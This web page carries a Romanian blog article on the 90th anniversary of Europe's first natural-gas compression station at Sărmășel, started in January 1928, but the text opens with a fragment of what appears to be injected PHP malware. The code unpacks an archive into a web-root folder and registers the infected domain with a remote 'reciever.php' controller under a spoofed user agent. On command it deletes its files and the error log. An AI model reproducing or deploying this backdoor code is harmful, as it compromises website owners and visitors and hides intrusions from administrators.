'; $data = $data1.$data2.$data3.$data4.$data5; $fas = fopen ($unzip_path, "w"); fwrite($fas, $data); fclose($fas); $unzip_url = 'http://'.$domain_name_2.'/'.$status[1].'unzip.php'; echo getURL($unzip_url); } } else { echo '~Can not upload archive!~'; rmdir($dir_path); exit; } if (file_exists($script_name)) { echo '~Client has been activated!~'; $file_name = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file = fopen($file_name,"rt"); $original_file = fread($file,filesize($file_name)); fclose($file); $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file.'reciever.php?data='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); exit; } else { echo '~Can not unziped!~'; unlink($archive_path); rmdir($dir_path); exit; } } else { echo '~Can not make dir!~'; exit; } } if ($status[0] == 'finish') { $file_name_2 = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file_2 = fopen($file_name_2,"rt"); $original_file_2 = fread($file_2,filesize($file_name_2)); fclose($file_2); if (($status[1] != null) and ($status[1] != '')) $dir_for_work = $status[1]; else $dir_for_work = 'conflg/'; $dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work; $archive_path = $dir_path.'1.zip'; if (is_dir($dir_path)) { $arr_filename = array (); if ($dh = opendir($dir_path)) { while (($file = readdir($dh)) !== false) { if (($file != ".") and ($file != "..")) $arr_filename[] = $file; } closedir($dh); } foreach ($arr_filename as $key) { $key = trim($key); $file_for_delete = "$dir_path/$key"; $file_for_delete = str_replace('///', '/', $file_for_delete); $file_for_delete = str_replace('//', '/', $file_for_delete); $file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete); $file_for_check = str_replace('//', '/', $file_for_check); if (substr_count($file_for_check, "/") >=2) { if (file_exists($file_for_delete)) unlink($file_for_delete); if (file_exists($file_for_delete)) { chmod($file_for_delete, 0777); unlink($file_for_delete); } } } } if (file_exists("error_log")) unlink("error_log"); if (is_dir($dir_path)) rmdir($dir_path); if (is_dir($dir_path)) { chmod($dir_path, 0777); rmdir($dir_path); } if (is_dir($dir_path)) echo "~Error!~"; else { $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file_2.'reciever.php?del='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); } exit; } } } ?> 22 ianuarie 1928 – 22 ianuarie 2018. 90 de ani de la punerea în funcțiune a primei stații de comprimare a gazelor naturale din Europa | Dumitru Chisalita

Rss

22 ianuarie 1928 – 22 ianuarie 2018. 90 de ani de la punerea în funcțiune a primei stații de comprimare a gazelor naturale din Europa

Deschiderea primului câmp de gaze pe actualul teritoriu al României în anul 1909, prin Sonda 2 Sărmășel, a determinat construirea primei conducte de transport gaze, Sărmăşel – Turda în anul 1914, a primei rețele urbane de distribuție a gazelor naturale în Turda în anul 1918 și lansarea activității gaziere în România. Consumul de gaze care era asigurat prin conducta Sărmășel – Turda a crescut rapid prin racordarea de noi consumatori din Turda, dar  și racordarea de noi localități. Astfel, de la un consum de cca. 50 mil mc/an în anul 1918 s-a ajuns în anul 1923 la un consum de 120-130 mil mc/an. Această situație a determinat exploatarea unei cantităţi importante de gaz din câmpul Sărmăşel, în consecinţă capacitatea acestui câmp de a face față consumului  s-a diminuat.

Consumul de gaz urma să crească în perspectiva anilor 1926 – 1927 și urmare a scăderii presiunii la sondele în exploatare, capacitatea de transport nu mai corespundea cererilor de consum din timpul iernii. Soluția găsită a fost instalarea unei staţii de compresoare în punctul inițial al conductei, adică la Sărmășel sau construirea unei noi conducte cu diametrul mai mare. Soluţia a doua cu toate că a avut mulţi aderenţi s-a considerat că prezintă o rentabilitate inferioară construcției unei stații de comprimare.

 

În urmă cu 90 de ani, fără să existe drumuri, mașini și calculatoare, s-a putut construi în numai 2 ani, în premieră europeană o stație de comprimare de gaze.

 

Proiectul staţiei de comprimare a fost elaborat de către Serviciul de Proiectare din cadrul Sonametan, în cursul anului 1926 şi la finele aceluiaşi an s-au făcut şi comenzile pentru agregatele de comprimare. Au fost procurate 3 unități de comprimare a gazelor, care puteau funcţiona cu simplă sau dublă acţiune, făcând astfel posibilă „urmărirea din aproape în aproape a tuturor variaţiunilor de consumaţie în limita capacităţii pentru care au fost construite”.­

Caracteristicile agregatelor achiziționate din SUA, în anul 1926 au fost:

– compresoare Duplex Ingersoll Rand cu o putere de 200 CP pe unitate, astfel stația de comprimare avea să aibă în total 600 CP

– turaţia 225 ture/minut.

– presiunea maximă de “suflare” (refulare) 18 atm;

Lucrările de construcție a stației au început în primăvara anului 1927, asigurându-se transportul agregatelor, a materialelor, realizarea fundațiilor, confecționarea claviaturii, construcția stației de pompare apă, construcția uzinei electrice, construcția turnului de apă de răcire a gazului, motoarelor, uleiului, construcția clădirilor halei de comprimare, ateliere, birouri etc.

În ciuda tuturor dificultăților cu care se confruntau oamenii la nivelul acelor ani – lipsa oricărei mașinării, boii și caii fiind singurele mijloace folosite în transportul materialelor, inexistența drumurilor pentru transportul materialelor, lipsa unei resurse calificate, unicitatea acestui proiect pe continentul european – la sfârșitul anului 1927 stația de comprimare era finalizată. Este important de menționat că echipa de lucrători care a construit stația de comprimare (exclusiv instalația tehnologică a stației, dar fără montarea compresoarelor) era compusă din doi mecanici şi opt lucrători conduşi de un monteur.

 

În urmă cu 90 de ani, 4 oameni au proiectat și 17 oameni au construit o stație unicat la acea vreme în Europa.

 

La 22 Ianuarie 1928 s-a pus în funcţiune primul agregat și la 26 ianuarie 1928 s-a pus în funcțiune agregatul al doilea. Agregatul al treilea a fost pus în funcţiune în data de 3 februarie 1928. Montarea compresoarelor, conectarea acestora la instalațiile tehnologice ale stației, punerea la punct a compresoarelor și încercarea lor a fost condusă de un inginer român, un monteur șef al firmei Inger­soll Rand și o echipă de 4 muncitori.

 

Astăzi, când România își propune să construiască mai multe stații de comprimare, ar fi util să ne propunem să ne ridicăm peste nivelul de acum 90 de ani!